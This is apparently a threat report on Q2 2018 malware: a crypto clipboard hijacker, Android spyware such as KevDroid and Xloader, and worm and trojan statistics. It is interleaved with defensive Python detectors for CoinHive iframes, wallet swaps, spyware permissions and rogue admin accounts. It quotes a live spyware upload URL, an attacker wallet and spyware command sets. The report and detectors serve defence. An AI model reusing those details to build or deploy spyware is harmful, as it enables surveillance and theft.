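As an added example that is not from the report, the following Python scanner does what the analyst above did by hand: it decodes strings handed to atob() or unescape() in a page's scripts, then looks in the raw and decoded HTML for an iframe that points at a CoinHive host or is sized 1x1. The sample page is constructed, and the base64/atob() encoding is an assumption, since the report does not show which encoding its sample used.

```python
"""Find CoinHive loaders hidden behind encoded strings and 1x1 iframes.

Added example, not code from the Comodo report. Decodes strings passed
to atob() (base64) or unescape() (percent-encoding) in a page's scripts,
then scans the raw page and every decoded layer for <iframe> tags that
point at a CoinHive host or are sized to be invisible. The sample page
below is constructed; the report does not show which encoding its
sample used, so base64 via atob() is an assumption.
"""
import base64
import binascii
import html
import re
from urllib.parse import unquote, urlparse

# Hosts named in the report: coinhive.com serves the miner, cnhv.co is
# CoinHive's own URL shortener used as the indirection.
COINHIVE_HOSTS = ("coinhive.com", "cnhv.co")

_ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
_UNESCAPE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")
_IFRAME = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
_ATTR = re.compile(r"([A-Za-z-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def decode_layers(text: str) -> list:
    """Return every payload recovered from atob()/unescape() calls in text."""
    layers = []
    for m in _ATOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue            # not real base64; ignore
        layers.append(raw.decode("utf-8", "replace"))
    for m in _UNESCAPE.finditer(text):
        layers.append(unquote(m.group(1)))
    return layers


def iframe_attrs(tag_body: str) -> dict:
    """Parse the attribute list of one <iframe ...> tag into a lowercase dict."""
    attrs = {}
    for m in _ATTR.finditer(tag_body):
        value = next((g for g in m.group(2, 3, 4) if g is not None), "")
        attrs[m.group(1).lower()] = html.unescape(value)
    return attrs


def is_coinhive_host(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in COINHIVE_HOSTS)


def find_hidden_miner_iframes(page: str) -> list:
    """Flag iframes that load a CoinHive host or are 0/1 pixels in both dimensions."""
    findings = []
    for layer in [page] + decode_layers(page):
        for m in _IFRAME.finditer(layer):
            a = iframe_attrs(m.group(1))
            src = a.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            known = is_coinhive_host(host)
            if known or tiny:
                findings.append({"src": src, "tiny": tiny, "known_host": known})
    return findings


# Constructed page: the iframe is hidden inside a base64 string that the
# page's own script decodes and writes into the DOM at load time.
_HIDDEN_IFRAME = ('<iframe src="https://cnhv.co/constructed-shortlink" '
                  'width="1" height="1"></iframe>')
SAMPLE_PAGE = (
    "<html><body><p>Welcome to the constructed sample site</p>\n"
    '<script>document.write(atob("'
    + base64.b64encode(_HIDDEN_IFRAME.encode()).decode()
    + '"));</script></body></html>'
)

if __name__ == "__main__":
    for hit in find_hidden_miner_iframes(SAMPLE_PAGE):
        print(hit)
```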
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses.
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spread of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
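As an added example, not from the report, the block below shows the defensive counterpart of the clipboard attack described above: a guard that remembers the wallet address the user copied and refuses the paste when the clipboard has since been rewritten to a different wallet-like value. The two addresses are the ones quoted in the report; the event sequence is constructed and no real clipboard API is touched, so the address patterns and the guard's interface are my assumptions.

```python
"""Clipboard guard against wallet-address swapping.

Added example, not code from the Comodo report. A hijacker watches the
clipboard and replaces a copied wallet address with the attacker's; this
guard does the inverse on the user's side: it records what the user copied
and, when the clipboard is read back for pasting, refuses any wallet-like
value that differs. The events below are constructed, using the two
addresses quoted in the report. No real clipboard API is used.
"""
import re
from dataclasses import dataclass, field

# Address shapes the guard understands. Assumption: these are the formats a
# practitioner would cover first; the report itself does not list them.
WALLET_PATTERNS = {
    "btc_p2pkh": re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_p2sh": re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_kind(text: str):
    """Return the address family of text, or None if it is not wallet-like."""
    s = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.match(s):
            return kind
    return None


@dataclass
class ClipboardGuard:
    """Remembers the user's own copy and compares it with what gets pasted."""
    last_copied: str = ""
    alerts: list = field(default_factory=list)

    def on_user_copy(self, text: str) -> None:
        # Called when the user performs the copy: this is the genuine value.
        self.last_copied = text.strip()

    def on_paste(self, clipboard_now: str) -> bool:
        """True if the paste is safe; False (and an alert recorded) if swapped."""
        now = clipboard_now.strip()
        copied_kind = wallet_kind(self.last_copied)
        if copied_kind is None:
            return True        # the user did not copy a wallet address
        if now == self.last_copied:
            return True        # clipboard untouched since the copy
        self.alerts.append({
            "copied": self.last_copied,
            "pasted": now,
            "copied_kind": copied_kind,
            "pasted_kind": wallet_kind(now),
        })
        return False


def replay_report_example() -> ClipboardGuard:
    """Constructed sequence mirroring the report: the user copies a P2SH
    address (leading 3) and the hijacker swaps in a P2PKH one (leading 1)."""
    guard = ClipboardGuard()
    guard.on_user_copy("3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs")
    guard.on_paste("1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm")  # what the malware wrote
    return guard


if __name__ == "__main__":
    for alert in replay_report_example().alerts:
        print("blocked paste:", alert)
```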
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details, contacts (ID, name, phone numbers) and the owner's email address. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server http://http.cgalim.com/admin/hr/pu/pu.php?do=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts accounts and contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records screen
Executes shell commands
Records calls
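The capability sets listed for KevDroid, Zoo Park and the other Android spyware above map almost one-to-one onto Android runtime permissions, which is why a first-pass triage of a suspicious APK usually starts with its manifest. The script below is an added example written for this report, not code from Comodo or from any of the samples described; it assumes a decoded AndroidManifest.xml (as produced by apktool or a similar decoder) and uses my own grouping of standard Android permission names into the spying capabilities the text describes. The two manifests embedded in it are constructed for illustration and are not taken from real samples.

```python
import xml.etree.ElementTree as ET

# Namespace prefix ElementTree uses for android:name attributes.
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Spying capability -> standard Android permissions that grant it.
# The permission names are real; the grouping is my own triage scheme (assumption).
CAPABILITY_PERMISSIONS = {
    "read SMS":         {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS"},
    "send SMS":         {"android.permission.SEND_SMS"},
    "call logs":        {"android.permission.READ_CALL_LOG"},
    "contacts":         {"android.permission.READ_CONTACTS"},
    "accounts":         {"android.permission.GET_ACCOUNTS"},
    "record audio":     {"android.permission.RECORD_AUDIO"},
    "camera":           {"android.permission.CAMERA"},
    "location":         {"android.permission.ACCESS_FINE_LOCATION",
                         "android.permission.ACCESS_COARSE_LOCATION"},
    "external storage": {"android.permission.READ_EXTERNAL_STORAGE",
                         "android.permission.WRITE_EXTERNAL_STORAGE"},
    "device identity":  {"android.permission.READ_PHONE_STATE"},
    "place calls":      {"android.permission.CALL_PHONE"},
}

# Number of distinct spying capabilities at or above which a sample is queued for manual review.
REVIEW_THRESHOLD = 4


def declared_permissions(manifest_xml: str) -> set:
    """Return the set of <uses-permission android:name="..."> values in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    return {
        el.get(ANDROID_NS + "name")
        for el in root.iter("uses-permission")
        if el.get(ANDROID_NS + "name")
    }


def triage_manifest(manifest_xml: str) -> dict:
    """Map declared permissions onto spying capabilities and decide whether the sample needs review."""
    perms = declared_permissions(manifest_xml)
    caps = sorted(cap for cap, needed in CAPABILITY_PERMISSIONS.items() if perms & needed)
    return {
        "capabilities": caps,
        "surveillance_score": len(caps),
        "needs_review": len(caps) >= REVIEW_THRESHOLD,
    }


# Constructed manifests (not from any real sample). The first requests the permission set a
# KevDroid-style fake "defender" app would need; the second is a plausible flashlight utility.
SPY_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakedefender">
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Fake Defender"/>
</manifest>
"""

FLASHLIGHT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Flashlight"/>
</manifest>
"""

if __name__ == "__main__":
    for label, manifest in (("fake defender", SPY_MANIFEST), ("flashlight", FLASHLIGHT_MANIFEST)):
        print(label, triage_manifest(manifest))
```

The score is a prioritisation aid, not a verdict: a legitimate messaging client also declares SMS and contacts permissions, so samples above the threshold still need a look at what the code does with them (hiding the launcher icon, Base64- or AES-encoding collected data, and posting it to a remote server are the behaviours the report describes).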
4.1.3 MikeSpy
Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it delivers a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contacts details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi to always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users:
App: FlexiSpy. Distribution: MBackup
App: HelloSpy. Distribution: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
App: Mobile Spy. Distribution: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset the call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便, 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity: it steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named below.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which increases its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April 2018
4.2.2 May 2018
Chart: Android-targeted malware in May 2018
4.2.3 June 2018
Chart: Android-targeted malware in June 2018
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
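The Starter behaviour just described (create a local account, then add it to the administrators group) leaves a pair of Windows Security events that are easy to correlate: 4720 "A user account was created" followed within seconds by 4732 "A member was added to a security-enabled local group". The rule below is an added example written for this report, not a Comodo detection or anything from the Starter analysis it cites; it assumes the events have already been exported as one flattened JSON record per line with the field names shown, and the five log lines embedded in it are constructed for illustration, not real telemetry.

```python
import json
from datetime import datetime, timedelta

# Local groups whose membership confers administrative control; extend for your environment (assumption).
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins"}

# A group add this soon after account creation is treated as part of the same action.
DEFAULT_WINDOW = timedelta(minutes=15)


def parse_events(jsonl: str) -> list:
    """Parse one JSON record per line into dicts with a datetime 'ts', oldest first."""
    events = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def find_created_then_elevated(events, window=DEFAULT_WINDOW, privileged_groups=PRIVILEGED_GROUPS):
    """Pair each 4720 (account created) with a later 4732 (added to a local group) on the same host.

    Returns one alert per account that was created and then placed in a privileged group
    within `window`. Group adds outside the window are ignored, so an account that is
    legitimately elevated days after creation does not fire this rule.
    """
    creations = {}   # (host, lowercase user) -> the 4720 event that created it
    alerts = []
    for ev in events:
        if ev["event_id"] == 4720:
            creations[(ev["host"], ev["target_user"].lower())] = ev
        elif ev["event_id"] == 4732 and ev["group"] in privileged_groups:
            created = creations.get((ev["host"], ev["member"].lower()))
            if created is not None and timedelta(0) <= ev["ts"] - created["ts"] <= window:
                alerts.append({
                    "host": ev["host"],
                    "user": created["target_user"],
                    "group": ev["group"],
                    "created_by": created["subject"],
                    "elevated_by": ev["subject"],
                    "delta_seconds": int((ev["ts"] - created["ts"]).total_seconds()),
                })
    return alerts


# Constructed sample log (not real telemetry), modelled on Windows Security event IDs
# 4720 (user account created) and 4732 (member added to a security-enabled local group).
# Host names, user names and timestamps are invented.
SAMPLE_LOG = """\
{"ts": "2018-06-02T03:14:07", "event_id": 4720, "host": "WS-0117", "subject": "SYSTEM", "target_user": "RemoteSvc"}
{"ts": "2018-06-02T03:14:09", "event_id": 4732, "host": "WS-0117", "subject": "SYSTEM", "member": "RemoteSvc", "group": "Administrators"}
{"ts": "2018-06-02T09:30:00", "event_id": 4720, "host": "WS-0042", "subject": "helpdesk.admin", "target_user": "jdoe"}
{"ts": "2018-06-02T09:30:20", "event_id": 4732, "host": "WS-0042", "subject": "helpdesk.admin", "member": "jdoe", "group": "Remote Desktop Users"}
{"ts": "2018-06-04T10:00:00", "event_id": 4732, "host": "WS-0042", "subject": "helpdesk.admin", "member": "jdoe", "group": "Administrators"}
"""

if __name__ == "__main__":
    for alert in find_created_then_elevated(parse_events(SAMPLE_LOG)):
        print(alert)
```

Only the first pair fires: RemoteSvc was created and made an administrator two seconds apart by a non-interactive subject, which is the shape of a malware-driven change; jdoe's creation by a helpdesk account, a Remote Desktop Users add, and an Administrators add two days later all fall outside the rule. In a real deployment the subject account and the creating process are the first pivots for triage.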
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
